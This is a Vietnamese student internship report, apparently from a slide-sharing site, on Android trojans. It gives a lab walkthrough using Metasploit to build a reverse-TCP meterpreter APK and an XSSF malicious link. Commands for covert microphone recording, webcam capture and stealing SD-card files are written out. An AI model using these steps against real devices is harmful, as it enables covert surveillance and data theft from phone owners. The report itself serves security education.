Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
 
Lehoangphi bacaocuoiky
Lehoangphi bacaocuoikyLehoangphi bacaocuoiky
Lehoangphi bacaocuoiky
 
Baocaothuctap quan
Baocaothuctap quanBaocaothuctap quan
Baocaothuctap quan
 
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương TàuBáo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
 
Baocaothuctap minhquan
Baocaothuctap minhquanBaocaothuctap minhquan
Baocaothuctap minhquan
 
Athena
AthenaAthena
Athena
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
 
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Ok
OkOk
Ok
 
Main thuc tap - duy
Main thuc tap - duyMain thuc tap - duy
Main thuc tap - duy
 
Báo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập AthenaBáo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập Athena
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Bctt
BcttBctt
Bctt
 

Bao cao tong ket

  • 1. 1 ĐẠI HỌC QUỐC GIA TP HỒ CHÍ MINH TRƯỜNG ĐẠI KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG ------ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ VÀ AN NINH MẠNG QUỐC TẾ ATHENA ------ BÁO CÁO THỰC TẬP DOANH NGHIỆP ĐỀTÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH LIÊN LẠC, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI Giáo viên hướng dẫn : THẦY VÕ ĐỖ THẮNG Sinh viên thực hiện : NGUYỄN VĂN THIÊN MSSV : 1120163 TP HỒ CHÍ MINH, THÁNG 11 NĂM 2014
  • 2. 2 NHẬN XÉT (Của giáo viên hướng dẫn ) ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... ......................................................................................................................................... .......................... , ngày …… tháng …… năm .......... Giáo viên hướng dẫn
  • 3. 3 Hình ảnh chụp với giáo viên hướng dẫn thầy Võ Đỗ Thắng
  • 4. 4 MỤC LỤC LỜI CẢM ƠN 1 MỞ ĐẦU 2 LỜI CAM KẾT 3 PHẦN I : TỔNG QUAN VỀ TRUNG TÂM I, Giới thiệu chung về Trung Tâm 4 II, Quá trình hình thành và phát triển 4 III, Cơ sở vật chất 4 IV, Đội ngũ giảng viên 5 V,Lĩnh vực hoạt động chính 5 VI, Dịch vụ hổ trợ 6 PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP I, Thời gian thực tập 7 II, Liệt kê nội dung thực tập 7 PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT I, Nghiên cứu cài đặt Kali trên máy ảo VMware 1, Chuẩn bị 9
  • 5. 5 2, Cài đặt máy ảo 10 3, Cài đặt kali trên máy ảo 15 II, Tạo Applications chứa mã độc trên kali linux tấn công thiết bị Android. 1, Tạo Applications chứa mã độc 21 2, Tiến hành khai thác dữ liệu 26 III, Tạo liên kết chứa mã độc trên kali và sử dụng tấn công thiết bị Android 1, Tạo liên kết chứa mã độc 31 2, Tiến hành khai thác dữ liệu 33
  • 6. 6 IV, TỔNG QUAN VỀ ANDROID 1, Giới thiệu 37 2, Đặc điểm 39 3, So sánh Android 2.x và 4.x 40 V, TẠO MÁY ẢO ANDROID TRÊN ECLIPSE 1, Bộ Java SE Development Kit (JDK) 43 2, Eclipse IDE và Android SDK 45 3. Tích hợp Android SDK và Eclipse 48 VI, KẾT NỐI MÁY CHỦ ẢO VPS 1, Giới thiệu máy chủ ảo VPS 51 2, Đặc điểm của VPS 51 3, Giá trị khi sử dụng VPS 52 4, Kết nối VPS 52 VII, CÀI ĐẶT METASPLOIT TRÊN VPS 1, Giới thiệu về phần mềm Metasploit 53 2, Giới thiệu payload Meterpreter 53 3, Cài đặt Metasploit 54 IIX, TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
  • 7. 7 1, Tạo ứng dụn chứa mã độc trên Kali lunix 56 2, Tấn công điện thoại Android 56 3, Các phuowg thức tấn công được sử dụng 57 PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN 62 PHỤ LỤC II : DANH SÁCH BÁO CÁO QUÁ TRÌNH 63 PHỤ LỤC III : TÀI LIỆU THAM KHẢO 64 NHẬT KÝ THỰC TẬP PHIẾU KHẢO SÁT LẦN 1, LẦN 2, LẦN 3
  • 8. 8 LỜI CẢM ƠN Trước hết em xin gửi lời cảm ơn và lòng biết ơn sâu sắc đến thầy Võ Đỗ Thắng, các thầy và anh chị trong Trung tâm ATHENA đã tận tình giúp đỡ, chỉ bảo và hướng dẫn em trong suốt thời gian thực tập. Trong suốt thời gian làm việc với thầy và trung tâm em không ngừng tiếp thu thêm nhiều kiến thức bổ ích mà còn học tập được tinh thần làm việc, thái độ nghiên cứu nghiêm túc, hiệu quả, chi tiết, và làm quan được với môi trường làm việc công nghiệp. Đây là những điều rất cần thiết cho em trong quá trình học tập và làm việc sau này. Em cũng xin gửi lời cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh nói chung và các thầy cô trong khoa Điện Tử Viễn Thông, bộ môn Máy tính – Hệ thống nhúng nói riêng đã tận tình giảng dạy, truyền đạt cho em những kiến thức, kinh nghiệm quý báu trong suốt bốn năm qua để em vững bước trên con đường học tập và công việc của mình sau này. Em xin chân thành cảm ơn văn phòng Athena tại 92 Nguyễn Đình Chiểu đã đã giúp em có được môi trường làm việc tốt nhất đồng thời cung cấp trang thiết bị giúp tôi có thể hoàn thành khóa thực tập này. Được sự giúp đỡ của Thầy và bạn bè, cùng với những nỗ lực của bản thân, em đã hoàn thành khóa thực tập doanh nghiệp đề tài “Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu trên thiết bị điện thoại sử dụng Android và gửi ra ngoài” xin kính trình Quý Thầy Cô xem xét và chấm điêm. Do trình độ nghiên cứu và thời gian có hạn, báo cáo của em chắc chắn không tránh khỏi có sự thiếu sót và hạn chế. Rất mong được sự góp ý và chỉ dẫn của Thầy cô. Em xin chân thành cảm ơn TP. Hồ Chí Minh, ngày 1 tháng 11 năm 2014 Sinh viên Nguyễn Văn Thiên
  • 9. 9 MỞ ĐẦU Khi bắt đầu tìm kiếm môi trường phù hợp cho việc thực tập, em đã đặt cho mình các mục tiêu sau: - Tiếp cận với môi trường doanh nghiệp để học cách làm việc của họ. - Nắm được quy trình phát triển phần mềm đang được áp dụng đồng thời tiếp cận được công nghệ mới. - Sử dụng được những kiến thức đã học trong 3 năm đầu. - Nhận được những kiến thức cần thiết cho công việc mà không được đề cập trên giảng đường. - Trau dồi các kỹ năng bản thân, nhất là kỹ năng làm việc nhóm và khả năng sử dụng tiếng Anh chuyên ngành. Xét thấy 5 mục tiêu trên là cần thiết với một sinh viên sắp rời khỏi ghế nhà trường, em cố gắng tìm kiêm một công ty, doanh nghiệp hay trung tâm có thể đáp ứng được mong muốn của mình. Sau một thời gian dài tìm hiểu và thăm dò qua bạn bè và người thân thấy “Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA” nhận sinh viên thực tập về các đề tài công nghệ di động, hệ điều hành di động Android mà em đang muốn tìm hiểu. Em quyết định nộp hồ sơ ứng tuyển vị trí thực tập sinh 2 tháng tại Trung tâm ATHENA, và đã được trung tâm nhận vào vị trí thực tập viên 2 tháng. Ngày 21/7/2014 em bắt đầu quá trình thực tập của mình ở trung tâm ATHENA.
  • 10. 10 LỜI CAM KẾT Em xin cam kết: · Những nội dung trong báo cáo này là do em tự thực hiện với sự hướng dẫn của Thầy, cán bộ và các bạn tại Trung Tâm ATHENA. · Mọi tham khảo trong quá trình thực hiện báo cáo đều được trích dẫn rõ ràng về nguồn về nội dung, tác giả, địa chỉ tham khảo. · Nếu sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn trách nhiệm. TP. Hồ Chí Minh, ngày 01 tháng 11 năm 2014 Sinh viên Nguyễn Văn Thiên
  • 11. 11 PHẦN I : TỔNG QUAN VỀ TRUNG TÂM I.Giới thiệu chung về Trung Tâm + Tên : Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena + Địa chỉ : - Cơ sở 1 : 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1,Tp.HCM - Cở sở 2 : 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1,Tp.HCM + Điện thoại : (08)38244041 + Email : support @athena.edu.vn & tuvan@athena.edu.vn + Website : www.athena.edu.vn + Logo : II. Quá trình hình thành và phát triển Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà . III. Cơ sở vật chất -Thiết bị đầy đủ và hiện đại -Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
  • 12. 12 công nghệ mới nhất. -Phòng máy rộng rãi, thoáng mát IV. Đội ngũ giảng viên Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước,... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA. Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA. V. Lĩnh vực hoạt động chính Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính.. Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,.... Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện
  • 13. 13 Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự
  • 14. 14 VI. Dịch vụ hỗ trợ: - Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn. - Giới thiệu việc làm cho mọi học viên. - Thực tập có lương cho học viên khá giỏi. - Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian. - Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng. - Hỗ trợ thi Chứng chỉ Quốc tế...
  • 15. 15 PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP I. Thời gian thực tập + Thời gian bắt đầu : 24/07/2014 + Thời gian kết thúc : 03/11/2014 + Giờ lên trung tâm :7h30 đến 10h00 thứ 3,5,7 /tuần II. Liệt kê nội dung thực tập Thời gian Nội dung công việc Ngày 24/7/2014 - Gặp giáo viên hướng dẫn, nhận đề tài thực tập và tài liệu hướng dẫn. Tuần 1 (24/7/2014 – 29/7/2014) - Cài đặt máy ảo Kali Linux trên phần mềm VMware workstation. - Nghiên cứu cơ chế tạo mã độc trên kali linux Tuần 2 (31/7/2014 – 05/8/2014) - Thực hành tạo mã độc trên kali linux và tấn công thiết bị di động sử dụng hệ điều hành Android - Quay video giới thiệu bản thân Tuần 3 (07/8/2014 – 14/8/2014) - Nghiên cứu tích hợp mã độc lên phần mềm - Thực hành tích hợp mã độc lên phần mềm - Nghiên cứu khai thác data trên smart phone Tuần 4 (16/8/2014 – 23/8/2014) - Thực hành khai thác trên các thiết bị smart phone - Tấn công Android qua đường link liên kết mã độc nhờ XSSF Tuần 5 (26/8/2014 – 04/9/2014) - Cài đặt Trojan qua ứng dụng iCalendar và iMatch Tuần 6-7 - Tìm hiểu máy chủ ảo VPS.
  • 16. 16 (06/9/2014 – 20/8/2014) - Tìm hiểu phần mềm Metasploit. - Cài đặt Metasploit trên máy chủ ảo VPS. Tuần 8 (22/9/2014 – 28/9/2014) - Cài đặt Metasploit trên máy chủ ảo VPS - Tham gia học và thi khóa học system hacking Tuần 9 (30/9/2014 – 5/10/2014) - Nghiên cứu việc tấn công vào điện thoại Android thật từ máy chủ ảo VPS. - Thực hành tấn công vào điện thoại Android từ máy chủ ảo VPS Tuần 10 (6/10/2014 – 12/10/2014) - Tổng hợp và làm báo cáo tổng kết 3/11/2014 - Báo cáo tổng kết
  • 17. 17 PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT I. Nghiên cứu cài đặt Kali Linux trên máy ảo VMware. 1, Chuẩn bị · Phần mềm VMware : Hiện nay phần mềm tạo máy ảo là một phần mềm được sử dụng rộng rãi. Ở bài báo cáo này mình cũng sử dụng VMware để tạo máy ảo. Các bạn cần download là tiến hành cài đặt phần mềm này. Ở đây mình sẽ không giới thiệu kỹ về phần này. Hướng dẫn cụ thể các bạn có thể tham khảo tại: https://www.youtube.com/watch?v=43O5Glide5M · Tải về file ISO phiên bản mới nhất của phần mềm Kali Linux. Các bạn có thể tải tại địa chỉ sau: http://www.kali.org/downloads Ta chọn thư mục để lưu. Các bạn cần nhớ thư mục mà các bạn chọn lưu này, vì
  • 18. 18 lúc cài ta sẽ sử dụng nó. Sau khi tải về ta sẽ có File ISO như sau. 2, Cài đặt Sau khi đã có phần mềm VMware và file ISO của kali ta tiến hành cài đặt Kali trên máy ảo. B1: Tiến hành mở VNware và tạo máy ảo mới Sau đó chọn chế độ Custom và next
  • 19. 19
  • 20. 20 B2: Chọn file ISO của kali đã download trước đó bằng cách chọn đường dẫn đến thu mục đã lưu. Sau đó tiếp tục.
  • 21. 21 B3: Chọn hệ điều hành. Chọn Linux->Debian 7 64bit, sau đó next
  • 22. 22 B4: Đặt tên cho máy ảo và, nơi lưu. Ở đây mình đặt tên cho may ảo là MayAo1, lưu tại địa chỉ mặc đinh, các bạn cũng có thể chọn nơi lưu khác.
  • 23. 23 B5: Cài đặt các thông số bộ nhớ Tùy theo cấu hình của máy thật mà các bạn chọn dung lượng bộ nhớ cho máy ảo. Ở đây máy mình dung lượng là 4Gb, mình sẽ chon dung lượng cho máy ảo là 1Gb. Sau đó next
  • 24. 24 B6: Chọn chế độ Network Chọn LSI Logic -> next, sau đó chọn SCSI -> next
  • 25. 25
  • 26. 26 Chọn Create a new virtual disk -> next -> next Tiếp tục next cho đến khi Finish
  • 27. 27 Đến đây ra đã tạo xong máy ảo. Tiến hành cài đặt kali trên máy ảo.
  • 28. 28 3, Cài đặt kali trên máy ảo B1: Khởi động máy ảo đã tạo. Chọn Graphic Install Sau đó chọn ngôn ngữ máy sử dụng. Sau đó máy ảo sẽ tiến hành cài đặt.
  • 29. 29
  • 30. 30 B2: Đặt tên Host name và Domain name Sau đó đặt passwords
  • 31. 31 B3: Sau đó tiếp tục Continue cho đến khi xuất hiện câu hỏi Yes/No. Ta chọn Yes. Sau đó chờ khoản 20 phút
  • 32. 32 B4 :Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader. Sau đó tiếp tục, hệ thống tự reboot lại.
  • 33. 33 B5: Đăng nhập Sau khi cài đặt xong, ta khởi động lại máy ảo, Phần urse ta nhập root. Sau đo nhập mật khảu mà ta đã đặt ở quá trình trước
  • 34. 34
  • 35. 35 Sau khi đăng nhập thành công, giao diện máy ảo xuất hiện. Vậy là ta đã hoàn thành quá trình cài đặt Kali Linux trên Máy ảo được tạo từ VMware.
  • 36. 36
  • 37. 37 II. Tạo Applications chứa mã độc trên kali linux và sử dụng để tấn công thiết bị Android. 1, Tạo Applications chứa mã độc Ta sẽ sử dụng Metasploit framework trên Kali linux để tạo một payload, khi các thiết bị android download và cài đặt payload này lên thiết bị thì chúng ta có thể xâm nhập để khi thác dữ liệu cũng như điều khiển thiết bị này. Ở đây chúng ta sử dụng Kali linux trên VMware. Trước tiên ta cần thiết lập Netwwork trên VMware. Vào VM -> setting… Chọn thiết lập như hình
  • 38. 38
  • 39. 39 Sau đó vào Edit -> Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) ta sẽ chọn adapter của máy thật mà ta đang sử dụng. Sau khi thiết lập hoàn tất trên VNware ta tiến hành mở máy Kali linux đã được tạo trước đó và tiến hành tạo file mã độc. Sau khi khởi động máy ảo Kali linux ta tiến hành mở cửa sổ terminal và kiểm tra IP của máy ảo bằng lệnh ifconfig.
  • 40. 40 Như hình ta thấy IP của máy ảo ở đây là 192.168.85.128 Sau đó gõ dòng lệnh sau: msfpayload android/meterpreter/reverse_tcp lhost=192.168.85.128 lport=8080 R > /root/Desktop/madoc.apk Lưu ý địa chỉ IP trong dòng lệnh trên là IP của máy ảo Kali ( địa chỉ mà chúng ta có trước đó ). Còn 8080 là số port, ta có thể sử dụng một số khác nhưng không nên chọn các port hay dùng.
  • 41. 41 Sau khi thực hiện câu lệnh trên hệ thông sẽ tạo một file madoc.apk trên desktop của máy ảo, đây chính là một Metasploit reverse tcp backdoor. Sau đó quay lại cửa sổ terminal nhập lệnh mfsconsole và chờ câu lệnh load xong như hình sau.
  • 42. 42 Sau đó ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ các lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.85.128 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080– nhập port giống với port khi tạo payload ở trên. Exploit Sau khi nhập xong các câu lệnh trên màn hình sẽ xó dạng như sau: Lúc này ta đang chờ thiết bị android muốn xâm nhập mở backdoor. Vậy là chúng ta đã tạo xong mã độc để xâm nhập android.
  • 43. 43 2, Tiến hành khai thác dữ liệu thông qua Applications chứa mã độc Khi máy android cài đặt và chạy ứng dụng chứa mã độc thì xuất hiện giao diện như sau, nếu ra nhấn vào Reverse TCP có nghĩ là máy android mà máy chủ kali lunix đã được kết nối với nhau Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.
  • 44. 44 Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được. 2.1, Khai thác thông tin hê thống: Xem thông tin hệ thống bằng lệnh “sysinfo”.
  • 45. 45
  • 46. 46 2.2, Ghi âm lén: Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh “record_mic”. File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali. 2.3, Khai thác webcam và chụp ảnh lén: Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã webcam>”.
  • 47. 47 File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali . 2.4, Khai thác file hệ thống của máy nạn nhân: Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
  • 48. 48 2.5, Khai thác dữ liệu từ SDCARD: Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd Download” và lệnh liệt kê “ls”.
  • 49. 49 Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. Ở đây dùng lệnh “download appsX.apk”. Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn công Kali. 2.6, Kết thúc tấn công: Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
  • 50. 50 III. Tạo liên kết chứa mã độc trên kali linux và sử dụng để tấn công thiết bị Android 1, Tạo Liên kết chứa mã độc Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework “msfupdate” “cd /opt/metasploit/apps/pro/msf3” “svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” Bước 3: Khởi động Metasploit bằng lệnh “msfconsole” Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose”
  • 51. 51
  • 52. 52 Bước 5: Thực hiện lệnh “xssf_urls” Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page… Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: http://192.168.149.136:80/xssf/test.html
  • 53. 53 2, Tiến hành khai thác dữ liệu thông qua Liên kết chứa mã độc Khi máy nạn nhân truy cập vào địa chỉ có chứa mã độc thì máy nạn nhân và máy chủ kali lunix được kết nối với nhau Khi đó ở máy chủ Kali sẽ có thông báo là có một máy nạn nhân 2.1, Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn mã độc http://192.168.149.136:80/xssf/test.html
  • 54. 54 2.2, Xem thông tin về nạn nhân đang truy cập: Dùng lệnh “xssf_information <ID máy nạn nhân>” Ở đây ví dụ là “xssf_information 1” 2.3, Khai thác dữ liệu từ máy nạn nhân: · Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có thể thao tác lên máy nạn nhân
  • 55. 55 · Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: “use auxiliary/xssf/public/misc/alert” “run” Ở máy nạn nhân sẽ nhận được cảnh báo XSSF
  • 56. 56 Thoát ra msf bằng lệnh “Ctrl+C” > “back” · Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không bằng lệnh: “use auxiliary/xssf/public/misc/visited_pages” “run” · Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: “use auxiliary/gather/android_htmlfileprovider” “set SRVPORT 87” “set URIPATH /” “run”
  • 57. 57 Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ Ta nhận được thông tin máy nạn nhân: 2.4, Thoát khỏi XSSF của Metasploit: Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
  • 58. 58 IV. TỔNG QUAN VỀ ANDROID 1. Giới thiệu: - Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty. - Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau. - Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng
  • 59. 59 trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động. - Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ. - Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất là 4.2 Jelly Bean (kẹo dẻo). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android.
  • 60. 60 2. Đặc điểm: - Tính mở: Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo. - Tính ngang bằng của các ứng dụng: Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. 